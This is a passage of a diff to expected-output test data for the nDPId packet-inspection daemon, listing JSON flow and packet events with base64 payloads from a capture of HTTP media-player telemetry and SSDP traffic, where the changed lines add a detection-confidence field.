 01637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1467353180202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"ts_msec":1467353180202,"pkt":"TF4M6gNlABxCjnAxCABFAAOlJdtAAIAGxG7AqHMIymwO7MVFAFDpA4l5\/kkWWlAYQRLiXwAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODAwNTImc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1467353180357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"ts_msec":1467353180357,"pkt":"TF4M6gNlABxCjnAxCABFAAOlJglAAIAGxEDAqHMIymwO7MVGAFChhpBHZLD+y1AYQTfUEAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODAwNTImc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="}
-01264{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353180052&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
+01290{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353180052&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1134,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1467353180443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353180443,"pkt":"ABxCjnAxTF4M6gNlCABFAAC501VAADMGZuDKbA7swKhzCABQxUZksP7LoYaTxFAYACF90QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjE5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180830,"flow_last_seen":1467353180830,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1467353180830,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1467353180830,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1467353180830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUgAAAQRyyvAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180830,"flow_last_seen":1467353180830,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1467353180830,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180830,"flow_last_seen":1467353180830,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1467353180830,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00817{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1467353181295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"ts_msec":1467353181295,"pkt":"TF4M6gNlKDc3Alz6CABFAAE99F1AAEAGPTfAqAUPROn9hf5oAFDPYUlYxJOK\/oAYEBX74gAAAQEICiYb7H8rI43TR0VUIC9jb21NYWdpY2FuQXBpL2NvbXBvc2l0ZS9hcHAucGhwL0dsb2JhbC9JbmRleC9pcCBIVFRQLzEuMQ0KSG9zdDogYXBpLm1hZ2ljYW5zb2Z0LmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtdHcNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KVXNlci1BZ2VudDogTWFnaWNhbiAodW5rbm93biB2ZXJzaW9uKSBDRk5ldHdvcmsvNzIwLjUuNyBEYXJ3aW4vMTQuNS4wICh4ODZfNjQpDQoNCg=="}
-00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}}
+00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}}
 00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1467353181515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"ts_msec":1467353181515,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4BFJAADUGOAhE6f2FwKgFDwBQ\/mjEk4r+z2FKYYAYABs0tgAAAQEICisjjrEmG+x\/SFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6NDcgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1467353182046,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1467353182046,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6IAAAER3+HAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1467353183830,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1467353183830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUkAAAQRyyrAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1467353185047,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1467353185047,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6MAAAER3+DAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01284{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1467353185940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"ts_msec":1467353185940,"pkt":"TF4M6gNlABxCjnAxCABFAAKdKslAAIAGwJnAqHMIymwO28VHAFCsEt6EcxJBblAYAQR7YQAAR0VUIC9jb3JlP3Q9MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZ0bT0zMCZyYT0xJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxODUmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="}
-01176{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=30&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353185&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+01202{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=30&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353185&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1467353186002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353186002,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5ehdAADMGwC\/KbA7bwKhzCABQxUdzEkFurBLg+VAYADiXAQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1467353186830,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1467353186830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUoAAAQRyynAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353187172,"flow_last_seen":1467353187172,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353187172,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
